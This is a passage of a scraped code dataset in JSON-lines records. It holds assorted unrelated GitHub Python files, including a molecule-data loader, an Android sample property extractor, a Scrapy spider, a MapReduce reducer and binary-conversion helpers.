self.model.objects.create(**data)\n response = {\n 'status': 'success',\n 'code': status.HTTP_200_OK,\n 'message': 'Password updated successfully',\n 'data': []\n }\n\n return Response(response)\n\nclass OsosViewSet(DocumentViewSet):\n document = OsosDocument\n serializer_class = OsosDocumentSerializer\n lookup_field = 'deviceId'\n\n filter_backends = [\n DefaultOrderingFilterBackend,\n FilteringFilterBackend,\n SearchFilterBackend,\n SuggesterFilterBackend,\n ]\n\n search_fields = '__all__'\n\n filter_fields = {\n 'id': {\n 'field': 'deviceId',\n 'lookups': [\n LOOKUP_FILTER_RANGE,\n LOOKUP_QUERY_IN,\n LOOKUP_QUERY_GT,\n LOOKUP_QUERY_GTE,\n LOOKUP_QUERY_LT,\n LOOKUP_QUERY_LTE,\n ],\n },\n }\n\n suggester_fields = {\n 'deviceId_suggest': {\n 'field': 'deviceId.suggest',\n 'suggesters': [\n SUGGESTER_COMPLETION,\n ],\n },\n }\n","repo_name":"dryalcinmehmet/moonbird","sub_path":"app/search/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"}
+{"seq_id":"12080361143","text":"import numpy as np\nimport pickle\nimport tensorflow as tf\n\n# loading the data\n\"\"\"\neach X are normalized differently.\n\"\"\"\n\n\"\"\"\nmax U0 ['molecule0'] = -1101.4877900833399 = -40.478909210233205eV\nmin U0 ['molecule133620'] = -19444.3873485546 = -714.5676940015802eV\n1 ha = 27.2114 ev\n\"\"\"\n# minE = 1101.4877900833399\n# maxE = 19444.3873485546\n\nminE = 40.478909210233205\nmaxE = 714.5676940015802\n\nmaxX =
0.5*9**2.4\n\nmin_muX = -0.5\nmax_muX = 0.5\n\n\"\"\"\nG : max -1102.022956412281 min -19445.314630956153\nH : max -1101.384033068429 min -19444.146473365512\nCv : max 46.969 min 6.002\n\"\"\"\n\nmax_G = 19445.314630956153\nmin_G = 1102.022956412281\n\nmax_H = 19444.146473365512\nmin_H = 1101.384033068429\n\nmax_Cv = 46.969\nmin_Cv = 6.002\n\nmax_min_dict = {\n 'G' : [max_G, min_G],\n 'H' : [max_H, min_H],\n 'Cv' : [max_Cv, min_Cv]\n}\n\ndef load_dict(file_path):\n with open(file_path, 'rb') as f:\n dict_subset = pickle.load(f)\n\n return dict_subset\n\ndef convert_to_inputs_outputs(AXEN_dict_subset, molecule_num_list, subset_num):\n A_array_list = []\n X_array_list = []\n output_E_list = []\n molecule_atom_num_list = []\n \n for i in molecule_num_list:\n A_hat = AXEN_dict_subset['molecule{}'.format(i)][0]\n D_hat = np.diag(np.sum(A_hat, axis=0))\n D_inv = np.linalg.inv(D_hat)\n A = np.dot(D_inv, A_hat)\n\n A_array = [\n A\n ]\n A_array = np.asarray(A_array)\n # A_array's shape is (1,29,29)\n\n num = AXEN_dict_subset['molecule{}'.format(i)][3]\n N = np.ones([1,29], dtype=np.int32)\n for N_num in range(num):\n N[0, N_num] = 0\n\n N_array = [\n N\n ]\n N_array = np.asarray(N_array).reshape([-1,1])\n # N_array's shape is (1,29,1)\n\n # X normalisation\n X = AXEN_dict_subset['molecule{}'.format(i)][1]\n # X = X/maxX/N**2\n X = X/maxX\n X_array = [\n X\n ]\n X_array = np.asarray(X_array)\n # X_array's shape is (1,29,29)\n\n E = AXEN_dict_subset['molecule{}'.format(i)][2]/27.2114\n # energy in ev\n E = (-E-minE)/(maxE-minE)\n # E = -1 + 2*(-E-minE)/(maxE-minE)\n # E normalisation btw (0, 1)\n E_array = [\n E\n ]\n E_array = np.asarray(E_array).reshape([-1,1])\n # E_array's shape is (1,1)\n\n \n\n A_array_list.append(A_array)\n X_array_list.append(X_array)\n output_E_list.append(E_array)\n molecule_atom_num_list.append(N_array)\n \n result = {\n 'A' : A_array_list,\n 'X' : X_array_list,\n 'E' : output_E_list,\n 'N' : molecule_atom_num_list\n }\n\n return result\n\ndef convert_to_muX(AXEN_dict_subset, muX_dict_subset, molecule_num_list, subset_num):\n muX_array_list = []\n \n for i in molecule_num_list:\n \n N = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][3]\n \n # muX normalisation\n muX = muX_dict_subset['molecule{}'.format(subset_num*1000 + i)]\n muX = muX/N**2\n # max_muX - min_muX = 1\n muX_array = [\n muX\n ]\n muX_array = np.asarray(muX_array)\n # muX_array's shape is (1,29,29)\n\n muX_array_list.append(muX_array)\n \n return muX_array_list\n\ndef split_data_set(result, train_set_size, valid_set_size, test_set_size):\n A_train = result['A'][0:train_set_size]\n A_valid = result['A'][train_set_size:train_set_size+valid_set_size]\n X_train = result['X'][0:train_set_size]\n X_valid = result['X'][train_set_size:train_set_size+valid_set_size]\n E_train = result['E'][0:train_set_size]\n E_valid = result['E'][train_set_size:train_set_size+valid_set_size]\n \n A_test = []\n X_test = []\n E_test = []\n \n for i in range(test_set_size):\n A_test.append(result['A'][np.random.randint(0,1000)])\n X_test.append(result['X'][np.random.randint(0,1000)])\n E_test.append(result['E'][np.random.randint(0,1000)])\n \n split_result = {\n 'A_train' : A_train,\n 'X_train' : X_train,\n 'E_train' : E_train,\n 'A_valid' : A_valid,\n 'X_valid' : X_valid,\n 'E_valid' : E_valid,\n 'A_test' : A_test,\n 'X_test' : X_test,\n 'E_test' : E_test\n }\n\n return split_result\n \ndef convert_to_inputs_outputs_tf(AXEN_dict_subset, molecule_num, subset_num):\n\n A_list = []\n X_list = []\n output_E_list = []\n 
molecule_atom_num_list = []\n \n\n\n for i in range(molecule_num):\n A_hat = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][0]\n D_hat = np.diag(np.sum(A_hat, axis=0))\n D_inv = np.linalg.inv(D_hat)\n A = np.dot(D_inv, A_hat)\n\n A = tf.convert_to_tensor(A)\n # A is a tensor shape (29,29)\n\n N = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][3]\n N_array = [\n N\n ]\n N_array = np.asarray(N).reshape([-1,1])\n # N_array's shape is (1,1)\n\n # X normalisation\n X = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][1]\n X = X/maxX/N**2\n X = tf.convert_to_tensor(X)\n # X is a tensor shape (29,29)\n\n E = AXEN_dict_subset['molecule{}'.format(subset_num*1000 + i)][2]\n E = (-E-minE)/(maxE-minE)\n # E normalisation btw (0, 1)\n E = tf.convert_to_tensor(E)\n # E shape ()\n \n\n A_list.append(A)\n X_list.append(X)\n output_E_list.append(E)\n molecule_atom_num_list.append(N_array)\n\n # converting all to tensor\n A_list = tf.convert_to_tensor(A_list)\n X_list = tf.convert_to_tensor(X_list)\n output_E_list = tf.convert_to_tensor(output_E_list)\n result = {\n 'A' : A_list,\n 'X' : X_list,\n 'E' : output_E_list,\n 'N' : molecule_atom_num_list\n }\n\n\ndef convert_output(which_output, output_file_path, molecule_num_list):\n output_dict = {\n 'G' : 'free_G',\n 'Cv' : 'Cv',\n 'H' : 'enthalpy'\n }\n output_file_path = output_file_path +'\\\\molecule_{}_dict.pickle'.format(output_dict[which_output])\n\n output_value_dict = load_dict(output_file_path)\n\n output_list = []\n\n for i in molecule_num_list:\n \n output = output_value_dict['molecule{}'.format(i)]\n output = (abs(output)-max_min_dict[which_output][1])/(max_min_dict[which_output][0]-max_min_dict[which_output][1])\n # output normalisation btw (0, 1)\n output_array = [\n output\n ]\n output_array = np.asarray(output_array).reshape([-1,1])\n \n output_list.append(output_array)\n\n return output_list","repo_name":"dave-khim/ML_project","sub_path":"model/model_data.py","file_name":"model_data.py","file_ext":"py","file_size_in_byte":6630,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41161542360","text":"#!/usr/bin\n# -*- coding: utf-8 -*-\n# @Time : 7/17/2023 2:09 PM\n# @Team : Siemens Prescan SLS\n# @Author : Yi Yang\n# @Support : prescansls.sisw@siemens.com\n\nfrom sensors.Iss import Iss\nfrom sensors.MetaSensor import Sensor\nfrom ObjectsSensorsParser import ObjectSensors\nfrom rename_api_namespace.simcpp_api import *\nfrom generators.MetaGenerator import Generator, Include\nimport shutil\n\n__load_module__ = [\"IssGenerator\"]\n\n\nclass IssGenerator(Generator):\n sensorName = Sensor.Iss\n\n class SensorInclude(Include):\n def __init__(self, dst: str):\n super().__init__(dst)\n self.include_iss_dependency = False\n\n def generate_codes(self, _object: ObjectSensors):\n if len(_object.objectSensors[IssGenerator.sensorName]) > 0 and not self.include_iss_dependency:\n self.includes += iss_incl\n self.sensorDemux += f'''{sensorDemux_incl_prefix}_Iss.h\"\\n'''\n shutil.copy(f\"{sensorDemux_file_prefix}_Iss.h\", self.dst + \"/simmodel/sensorsdemux\")\n self.include_iss_dependency = True\n\n def __init__(self):\n super().__init__()\n\n def generate_codes(self, _object: ObjectSensors):\n issSensor_prefix = f\"issSensor_{_object.ps_object.name}\"\n issUnit_prefix = f\"issUnit_{_object.ps_object.name}\"\n\n for iss in _object.objectSensors[IssGenerator.sensorName]: # type: Iss\n self.properties += f\"{self.space4}//Add Iss sensor properties\\n\"\n self.properties 
+= f\"{self.space4}{IssSensor} {issSensor_prefix}_{iss.iss.name};\\n\"\n self.properties += f\"{self.space4}{IssSensorUnit}* {issUnit_prefix}_{iss.iss.name}\" + \"{nullptr};\\n\"\n\n # output properties\n self.properties += f\"{self.space4}{uint8_t_vector_ptr} {issUnit_prefix}_{iss.iss.name}_R;\\n\"\n self.properties += f\"{self.space4}{uint8_t_vector_ptr} {issUnit_prefix}_{iss.iss.name}_G;\\n\"\n self.properties += f\"{self.space4}{uint8_t_vector_ptr} {issUnit_prefix}_{iss.iss.name}_B;\\n\"\n\n self.constructor += f\"{self.space4}//Construct Iss sensor properties\\n\"\n self.constructor += f\"{self.space4}{issUnit_prefix}_{iss.iss.name}_R = {uint8_t_vector_ptr_make};\\n\"\n self.constructor += f\"{self.space4}{issUnit_prefix}_{iss.iss.name}_G = {uint8_t_vector_ptr_make};\\n\"\n self.constructor += f\"{self.space4}{issUnit_prefix}_{iss.iss.name}_B = {uint8_t_vector_ptr_make};\\n\"\n\n self.registerUnits += f\"{self.space4}//register Iss sensor units\\n\"\n self.registerUnits += f\"{self.space4}{issSensor_prefix}_{iss.iss.name} = \" \\\n f\"{getIssSensor}(\\\"{iss.iss.name}\\\");\\n\"\n self.registerUnits += f\"{self.space4}{issUnit_prefix}_{iss.iss.name} = \" \\\n f\"{registerIssSensorUnit}(simulation, {issSensor_prefix}_{iss.iss.name});\\n\"\n\n self.steps += f\"{self.space4}//demux Iss outputs\\n\"\n func_space = \" \" * 6\n\n port_R = f\"{issUnit_prefix}_{iss.iss.name}_R\" \\\n if _object.enable_all_ports else Generator.Terminator\n port_G = f\"{issUnit_prefix}_{iss.iss.name}_G\" \\\n if _object.enable_all_ports else Generator.Terminator\n port_B = f\"{issUnit_prefix}_{iss.iss.name}_B\" \\\n if _object.enable_all_ports else Generator.Terminator\n\n self.steps += f\"{self.space4}{sensorDemux}::demux_Iss(\\n\" \\\n f\"{func_space}{issUnit_prefix}_{iss.iss.name},\\n\" \\\n f\"{func_space}//Demux, RGB come in column:\\n\" \\\n f\"{func_space}{port_R}, // ->R (valid)\\n\" \\\n f\"{func_space}{port_G}, // ->G (valid)\\n\" \\\n f\"{func_space}{port_B}); // ->B (valid)\\n\"\n\n self.steps += \"\\n\"\n self.properties += \"\\n\"\n self.constructor += \"\\n\"\n self.registerUnits += \"\\n\"\n","repo_name":"sdlizheng2015/prescansimcppgenerator","sub_path":"generators/IssGenerator.py","file_name":"IssGenerator.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16246622478","text":"#!/usr/bin/env python3\n\n\"\"\"\n__author__ = \"Axelle Apvrille\"\n__status__ = \"Beta\"\n__license__ = \"MIT License\"\n\"\"\"\n\nimport droidutil\nimport droidconfig\nimport droidcountry\nimport droidsql\nimport json\nimport requests\nimport logging\nimport re\nimport configparser # to import Exodus Privacy trackers\nfrom sqlalchemy.orm import sessionmaker\nimport sqlalchemy.exc\n\nlogging.basicConfig(format='%(levelname)s:%(filename)s:%(message)s',\n level=logging.INFO)\n\n\n# This is where to set whether given fields have\n# a meaning or not for a given file type\napplicability = {'file_size': [droidutil.APK, droidutil.DEX, droidutil.ARM,\n droidutil.CLASS, droidutil.ZIP, droidutil.RAR],\n 'file_small': [droidutil.APK, droidutil.DEX, droidutil.ARM,\n droidutil.CLASS, droidutil.ZIP, droidutil.RAR],\n 'file_nb_classes': [droidutil.APK, droidutil.DEX],\n 'file_nb_dir': [droidutil.APK, droidutil.DEX],\n 'file_innerzips': [droidutil.APK, droidutil.ZIP, droidutil.RAR],\n 'cert': [droidutil.APK],\n 'manifest': [droidutil.APK],\n 'smali': [droidutil.APK, droidutil.DEX],\n 'wide': [droidutil.APK, droidutil.DEX],\n 'arm': 
[droidutil.APK, droidutil.ARM],\n 'dex': [droidutil.APK, droidutil.DEX],\n 'kit': [droidutil.APK, droidutil.DEX]\n }\n\nclass droidproperties:\n verbose = False\n \"\"\"Extracted properties\"\"\"\n\n \"\"\"Field allocation\"\"\"\n certificate = {}\n manifest = {}\n smali = {}\n wide = {}\n arm = {}\n dex = {}\n kits = {}\n\n def __init__(self, config, samplename='', sha256='', verbose=False, import_exodus=False):\n \"\"\"Properties concern a given sample identified by a basename (to be helpful) and a sha256 (real reference)\"\"\"\n self.config = config\n self.verbose = verbose\n if verbose:\n logging.getLogger().setLevel(logging.DEBUG)\n self.sha256 = sha256\n self.sanitized_basename = samplename\n self.import_exodus = import_exodus\n self.clear_fields()\n\n def clear_fields(self):\n \"\"\"Re-initialize all fields of the object - to default values\"\"\"\n self.file_nb_classes = 0\n self.file_nb_dir = 0\n self.file_size = 0\n self.file_small = False\n self.filetype = droidutil.UNKNOWN\n self.file_innerzips = False\n\n self.certificate.clear()\n self.certificate = {'av': False,\n 'algo': None,\n 'debug': False,\n 'dev': False,\n 'famous': False,\n 'serialno': None,\n 'country': droidcountry.country['unknown'],\n 'owner': None,\n 'timestamp': None,\n 'year': 0,\n 'unknown_country': False\n }\n\n self.manifest.clear()\n self.manifest = {\n 'activities': [],\n 'libraries': [],\n 'listens_incoming_sms': False,\n 'listens_outgoing_call': False,\n 'maxSDK': 0,\n 'main_activity': None,\n 'minSDK': 0,\n 'package_name': None,\n 'permissions': [],\n 'providers': [],\n 'receivers': [],\n 'services': [],\n 'swf': False,\n 'targetSDK': 0\n }\n\n # automatically adding smali properties. \n self.smali.clear()\n self.smaliconfig = droidconfig.droidconfig(self.config.SMALI_CONFIGFILE, self.verbose)\n for section in self.smaliconfig.get_sections():\n self.smali[section] = False\n\n self.smali['packed'] = False # This property is not in conf section as it is deduced from no main activity + loading DEX dynamically\n self.smali['multidex'] = []\n\n # automatically adding wide properties\n self.wide.clear()\n self.wide['app_name'] = None\n self.wide['phonenumbers'] = []\n self.wide['urls'] = []\n self.wide['base64_strings'] = []\n self.wide['apk_zip_url'] = False\n self.wideconfig = droidconfig.droidconfig(self.config.WIDE_CONFIGFILE, self.verbose)\n for section in self.wideconfig.get_sections():\n self.wide[section] = False\n\n # automatically add ARM properties\n self.arm.clear()\n self.armconfig = droidconfig.droidconfig(self.config.ARM_CONFIGFILE, self.verbose)\n for section in self.armconfig.get_sections():\n self.arm[section] = False\n\n self.dex.clear()\n self.dex = {'magic': 0,\n 'odex': False,\n 'magic_unknown': False,\n 'bad_sha1': False,\n 'bad_adler32': False,\n 'big_header': False,\n 'thuxnder': False\n }\n\n # automatically set to False kit properties\n self.kits.clear()\n self.kitsconfig = droidconfig.droidconfig(self.config.KIT_CONFIGFILE,\n self.verbose)\n for section in self.kitsconfig.get_sections():\n self.kits[section] = False\n\n if self.import_exodus:\n self.import_exodus_trackers()\n quit()\n # END OF reinit to default values\n\n def import_exodus_trackers(self):\n # import ETIP Exodus Privacy trackers\n url = 'https://etip.exodus-privacy.eu.org/api/trackers/?format=json'\n logging.debug(f'Importing ETIP Exodus trackers from {url}')\n r = requests.get(url)\n if r.status_code != 200:\n logging.warning('Cannot download Exodus Privacy trackers: '\n f'{url} responds code={r.status_code}')\n 
return\n j = json.loads(r.text)\n config = configparser.ConfigParser()\n for tracker in j:\n # remove trailing dots\n code_signature = re.sub('\\.\\|', '|', tracker['code_signature']).rstrip('.').lstrip('.').replace('.', '/').replace('\\/', '/').split('|')\n for sig in code_signature:\n if len(re.sub('[^a-zA-Z0-9/_]', '', sig)) == 0:\n continue\n if self.kitsconfig.is_pattern_present(sig):\n # logging.debug(f'Not adding tracker={tracker[\"name\"]}'\n # f' as pattern={sig} is already present')\n break\n # sanitize name\n name = re.sub('[^a-zA-Z0-9]', '', tracker['name']).lower()\n # if our signature is more generic, nothing to do\n if name in self.kits:\n # our signature is less generic / missing a pattern\n logging.debug(f'name={name} sig={sig} pattern={self.kitsconfig.get_pattern(name)}')\n logging.warning(f'You should add pattern={sig}'\n f' in tracker={tracker[\"name\"]}')\n break\n logging.debug(f'Adding Exodus Tracker: {name}')\n config[name] = {}\n config[name]['description'] = f'{tracker[\"name\"]} (from ETIP Exodus Privacy list)'\n config[name]['pattern'] = '|'.join(code_signature)\n break\n logging.debug('Appending imported trackers '\n f'to {self.config.KIT_CONFIGFILE}')\n with open(self.config.KIT_CONFIGFILE, 'a') as configfile:\n config.write(configfile)\n\n def write(self, sql):\n Session = sessionmaker(bind=sql.engine)\n session = Session()\n sample = droidsql.Sample(sha256=self.sha256,\n sanitized_basename=self.sanitized_basename,\n file_nb_classes=self.file_nb_classes,\n file_nb_dir=self.file_nb_dir,\n file_size=self.file_size,\n file_small=self.file_small,\n filetype=self.filetype,\n file_innerzips=self.file_innerzips,\n manifest_properties=json.dumps(self.manifest),\n smali_properties=json.dumps(self.smali),\n wide_properties=json.dumps(self.wide),\n arm_properties=json.dumps(self.arm),\n dex_properties=json.dumps(self.dex),\n kits=json.dumps(self.kits))\n session.add(sample)\n try:\n session.commit()\n except sqlalchemy.exc.IntegrityError:\n # occurs when the sample with the same sha256 is already in\n logging.debug(\"Sample is already in the database\")\n\n def dump_json(self, filename='report.json'):\n data = {'sanitized_basename': self.sanitized_basename,\n 'file_nb_classes': self.file_nb_classes,\n 'file_nb_dir': self.file_nb_dir,\n 'file_size': self.file_size,\n 'file_small': self.file_small,\n 'filetype': self.filetype,\n 'file_innerzips': self.file_innerzips,\n 'manifest_properties': self.manifest,\n 'smali_properties': self.smali,\n 'wide_properties': self.wide,\n 'arm_properties': self.arm,\n 'dex_properties': self.dex,\n 'kits': self.kits\n }\n if self.verbose:\n print(\"-------------\")\n print(\"Dumping to JSON file {}\".format(filename))\n f = open(filename, 'w')\n f.write(json.dumps(data))\n f.close()\n","repo_name":"cryptax/droidlysis","sub_path":"droidproperties.py","file_name":"droidproperties.py","file_ext":"py","file_size_in_byte":9831,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"60"} +{"seq_id":"8651151926","text":"from sqlalchemy import *\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nimport datetime\n\n\nclass DatabaseHandler:\n def __init__(self):\n self._engine = create_engine('sqlite:///{}'.format(self._db_path))\n self._engine.echo = False # print all sql commands\n self.Base.metadata.create_all(self._engine)\n self._Session = sessionmaker(bind=self._engine)\n self._session = self._Session()\n self.__lastCommitTimestamp = 
datetime.datetime.now()\n\n def write_to_db(self, object):\n self._session.add(object)\n timestamp = datetime.datetime.now()\n if (timestamp - self.__lastCommitTimestamp).total_seconds() > 60:\n self.flush()\n self.__lastCommitTimestamp = timestamp\n\n def flush(self):\n self._session.commit()\n\n\nclass SimpleDatabase(DatabaseHandler):\n Base = declarative_base()\n\n class DataModel(Base):\n __tablename__ = \"SatoriBikeData\"\n key = Column(Integer, primary_key=True, autoincrement=True)\n id = Column(INTEGER)\n stationName = Column(String)\n availableDocks = Column(INTEGER)\n totalDocks = Column(INTEGER)\n latitude = Column(REAL)\n longitude = Column(REAL)\n statusValue = Column(String)\n statusKey = Column(INTEGER)\n availableBikes = Column(INTEGER)\n lastCommunicationTime = Column(String)\n\n def get_column_names_dict(self):\n colum_dict = self.__table__.columns.keys()\n colum_dict.pop(0)\n return colum_dict\n\n def __init__(self, db_path):\n self._db_path = db_path\n super(SimpleDatabase, self).__init__()\n","repo_name":"dataGeeek/bike-streaming","sub_path":"ingestion-to-db/src/satori_ingestion/helper/database_manager.py","file_name":"database_manager.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"20416345655","text":"#!/usr/bin/env python\n\nimport sys\n\ndef main(argv):\n\tline = sys.stdin.readline()\n\tline = line.split(\":\")\n\tfirst_person_id = int(line[0])\n\tfirst_person_connections = list(map(int, line[1].strip(\"\\n\").split(\",\")))\n\tfirst_person_connections_set = set(first_person_connections)\n\tmax_people = int(first_person_connections.pop(-1))\n\tall_people = set(range(1, max_people +1))\n\tnon_connections = all_people.difference(first_person_connections)\n\tmight_know = []\n\tprobably_know = []\n\tprint(non_connections)\n\n\t# for line in sys.stdin:\n\t# \tline = line.split(\":\")\n\t# \tsecond_person_id = int(line[0])\n\t# \tsecond_person_connections = list(map(int, line[1].strip(\"\\n\").split(\",\")))\n\t# \tnum_people_known = 0\n\n\t# \tfor third_person in second_person_connections:\n\t# \t\tif third_person in first_person_connections:\n\t# \t\t\tnum_people_known += 1\n\n\t# \t\tif second_person_id not in first_person_connections:\n\t# \t\t\tif num_people_known in [2, 3]:\n\t# \t\t\t\tmight_know.append(second_person_id)\n\n\t# \t\t\telif num_people_known >= 4:\n\t# \t\t\t\tprobably_know.append(second_person_id)\n\n\t# \t# logic for printing output\n\t# \tif len(might_know) != 0 and len(probably_know) != 0:\n\t# \t\tmight_know, probably_know = _convert_to_str(might_know, probably_know)\n\t# \t\tprint('%s:Might(%s) Probably(%s)' % (first_person_id, might_know, probably_know))\n\t\t\n\t# \telif len(might_know) != 0 and len(probably_know) == 0:\n\t# \t\tmight_know = _convert_to_str(might_know)\n\t# \t\tprint('%s:Might(%s)' % (first_person_id, might_know))\n\t\t\n\t# \telif len(might_know) == 0 and len(probably_know) != 0:\n\t# \t\tprobably_know = _convert_to_str(probably_know)\n\t# \t\tprint('%s:Probably(%s)' % (first_person_id, probably_know))\n\t\t\n\t# \telse:\n\t# \t\tprint('%s:' % (first_person_id))\n\n# convert to string function\ndef _convert_to_str(might_know = None, probably_know = None):\n\ttry:\n\t\tif might_know is not None and probably_know is not None:\n\t\t\tmight_know = sorted(might_know)\n\t\t\tmight_know = \",\".join(str(value) for value in might_know)\n\t\t\tprobably_know = sorted(probably_know)\n\t\t\tprobably_know = \",\".join(str(value) for 
value in probably_know)\n\t\t\treturn(might_know, probably_know)\n\t\t\n\t\telif might_know is not None and probably_know is None:\n\t\t\tmight_know = sorted(might_know)\n\t\t\tmight_know = \",\".join(str(value) for value in might_know)\n\t\t\treturn(might_know)\n\t\t\n\t\telif might_know is None and probably_know is not None:\n\t\t\tprobably_know = sorted(probably_know)\n\t\t\tprobably_know = \",\".join(str(value) for value in probably_know)\n\t\t\treturn(probably_know)\n\t\n\texcept Exception as error:\n\t\treturn(error)\n\nif __name__ == \"__main__\":\n\tmain(sys.argv)","repo_name":"kevinbarry7/DS730","sub_path":"Project_1_MapReduce/problem_3/reducer3_1.py","file_name":"reducer3_1.py","file_ext":"py","file_size_in_byte":2548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70896152832","text":"'''\r\nCreated on 12 ago 2017\r\n\r\n@author: davide\r\n'''\r\n\r\n'''\r\n Computes the derivative wrt y_hat of the log loss function\r\n'''\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nsns.set()\r\n\r\ndef der_log_loss(y_hat, y):\r\n value = -y/y_hat + (1 - y)/(1 - y_hat)\r\n return value\r\n\r\ny = 1\r\ny_hat = np.linspace(0, 1, int(1E3))\r\nl = der_log_loss(y_hat, y)\r\n_ = plt.plot(y_hat, l)\r\n_ = plt.xlabel('y_hat')\r\n_ = plt.ylabel('log loss')\r\n_ = plt.suptitle(\"Derivative of Log loss as a function of y_hat when the truth is 1\")\r\nplt.margins(0.02)\r\nplt.show()\r\n\r\ny = 0\r\ny_hat = np.linspace(0, 1, int(1E3))\r\nl = der_log_loss(y_hat, y)\r\n_ = plt.plot(y_hat, l)\r\n_ = plt.xlabel('y_hat')\r\n_ = plt.ylabel('log loss')\r\n_ = plt.suptitle(\"Derivative Log loss as a function of y_hat when the truth is 0\")\r\nplt.margins(0.02)\r\nplt.show()\r\n","repo_name":"davidedr/Ng-s-Neural-Networks-and-Deep-Learning","sub_path":"src/der_log_loss.py","file_name":"der_log_loss.py","file_ext":"py","file_size_in_byte":846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73780621950","text":"import sys\nimport pickle\nimport numpy as np\nimport scipy.misc\nimport scipy.ndimage\nimport theano\nimport utils\n\n\ndef run(filename_in, filename_out):\n # parameters of CNN-VLM model\n model_name = 'vggnet'\n layer_names = [\n 'data',\n 'conv1_2',\n 'conv2_2',\n 'conv3_4',\n 'conv4_4',\n 'conv5_4',\n ]\n directory = './theanomodel'\n filename = (\n '%s/%s_vlm_%s.pkl' %\n (directory, model_name, '_'.join(layer_names))\n )\n\n # parameters of saliency map\n layer_target = 'conv5_4'\n pool_size = 2**4\n pow_ = 0.5\n sigma = 0.03\n\n # load model\n model = pickle.load(open(filename))\n func = theano.function(\n [model['data']],\n model['loss_lm_%s_map' % layer_target]\n )\n img_mean = utils.load_mean_image()\n\n # load image\n img1 = utils.load_image(filename_in, img_mean)\n\n # compute unnaturalness map\n img2 = func(img1[None, :, :, :]).squeeze()\n\n # pow\n img2 = img2 ** pow_\n\n # resize to original size\n img2 = rescale_image(img2, pool_size)\n img2 = pad_image(img2, img1.shape[1:])\n\n # blur\n img2 = scipy.ndimage.filters.gaussian_filter(\n img2,\n (sigma*img2.shape[0], sigma*img2.shape[1]),\n )\n\n # normalize\n img2 = (img2 - img2.min()) / (img2.max() - img2.min())\n img2 = (img2 * 255).astype(np.uint8)\n\n # save\n scipy.misc.imsave(filename_out, img2)\n\n\ndef rescale_image(img, scale):\n return scipy.misc.imresize(img, (scale*img.shape[0], scale*img.shape[1]))\n\n\ndef pad_image(img, shape):\n pad_ud = shape[0] - img.shape[0]\n 
pad_lr = shape[1] - img.shape[1]\n pad_u = pad_ud / 2\n pad_d = pad_ud - pad_u\n pad_l = pad_lr / 2\n pad_r = pad_lr - pad_l\n img = np.vstack((\n np.zeros((pad_u, img.shape[1])),\n img,\n np.zeros((pad_d, img.shape[1])),\n ))\n img = np.hstack((\n np.zeros((img.shape[0], pad_l)),\n img,\n np.zeros((img.shape[0], pad_r)),\n ))\n return img\n\n\nif __name__ == '__main__':\n filename_in = sys.argv[1]\n filename_out = sys.argv[2]\n run(filename_in, filename_out)\n","repo_name":"hiroharu-kato/cnn_vlm","sub_path":"compute_saliency_map.py","file_name":"compute_saliency_map.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"60"} +{"seq_id":"14239446694","text":"import scrapy\n\nclass StackOverflowSpider(scrapy.Spider):\n name = \"stackoverflow\"\n\n def start_requests(self):\n urls = [\n 'https://stackoverflow.com/questions/tagged/python'\n ]\n\n for url in urls:\n yield scrapy.Request(url=url, callback=self.parse)\n\n def parse(self, response):\n filename = \"test.html\"\n\n with open(filename, 'wb') as f:\n questions = response.xpath('//*[@class=\"fs-body3 grid--cell fl1 mr12 sm:mr0 sm:mb12\"]/text()').get().strip()\n questions = questions[:-12]\n f.write(questions.encode())","repo_name":"nadee13/scrapy","sub_path":"example/spiders/stackoverflow_spider.py","file_name":"stackoverflow_spider.py","file_ext":"py","file_size_in_byte":599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12480937112","text":"def continue_func():\n print()\n print(\"Press to continue\")\n print(\"-\"*30)\n input()\n\n# Decimal to Binary\ndef dec_to_bin(dec_num):\n original_num = int(dec_num)\n binary_num = [128,64,32,16,8,4,2,1]\n binary = []\n bin_string = ''\n\n for num in binary_num:\n if original_num >= num:\n original_num -= num\n binary.append(1)\n else:\n binary.append(0)\n\n for original_num in binary:\n bin_string += str(original_num)\n\n return bin_string\n\n# Binary to Decimal Conversion\ndef bin_to_dec(bin_str):\n binary_string = str(bin_str)\n bin_to_list = list(binary_string)\n value = 0\n\n for num in range(len(bin_to_list)):\n digit = bin_to_list.pop()\n if digit == '1':\n value = value + pow(2, num)\n \n return value\n\n\ndef bin_inverse(bin_str):\n output = ''\n neg_output = ''\n\n if bin_str[0] == '0':\n for el in bin_str:\n if el == '1':\n output += '0'\n else:\n output += '1'\n\n add_one = bin_add(output, '1')\n return add_one\n \n elif bin_str[0] == '1':\n sub_one = bin_sub(bin_str, '1')\n for el in sub_one:\n if el == '0':\n neg_output += '1'\n elif el == '1':\n neg_output += '0'\n return neg_output\n\n\ndef bin_add(bin_str_1, bin_str_2):\n max_width = max(len(bin_str_1), len(bin_str_2))\n bin_str_1 = bin_str_1.zfill(max_width)\n bin_str_2 = bin_str_2.zfill(max_width)\n\n output = ''\n carry = 0\n for i in reversed(range(len(bin_str_1))):\n if carry == 0:\n if bin_str_1[i] == '0' and bin_str_2[i] == '0':\n output = output + '0'\n carry = 0\n elif bin_str_1[i] == '1' and bin_str_2[i] == '1':\n output += '0'\n carry = 1\n else:\n output += '1'\n carry = 0\n else:\n if 